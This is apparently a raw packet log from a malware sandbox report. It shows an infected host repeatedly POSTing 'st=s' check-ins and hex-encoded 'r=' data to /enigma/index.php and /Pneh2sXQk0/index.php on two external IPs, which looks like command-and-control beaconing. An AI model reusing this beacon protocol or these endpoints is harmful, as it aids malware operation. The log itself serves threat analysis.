                                                                                                                                                                                                                                      Apr 19, 2024 03:36:40.555805922 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:40.803416014 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1461192.168.2.551316193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:41.049673080 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:41.303070068 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1462192.168.2.551317193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:41.050071955 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:41.298599005 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1463192.168.2.551319193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:41.632816076 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:41.875309944 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1464192.168.2.551318193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:41.637824059 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:41.890289068 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1465192.168.2.551320193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.129074097 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.383872986 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1466192.168.2.551321193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.143060923 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.395394087 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1467192.168.2.551322193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.727334023 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.970541000 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1468192.168.2.551323193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.735476971 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.987533092 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1469192.168.2.551324193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.218916893 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.465962887 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1470192.168.2.551325193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.239856005 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.491378069 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1471192.168.2.551326193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.800664902 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.042922974 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1472192.168.2.551327193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.821569920 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.069855928 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1473192.168.2.551328193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.293474913 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.541182995 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1474192.168.2.551329193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.315207005 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.560560942 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1475192.168.2.551331193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.885476112 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:45.131997108 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1476192.168.2.551332193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.909117937 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:45.161901951 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1477192.168.2.551333193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
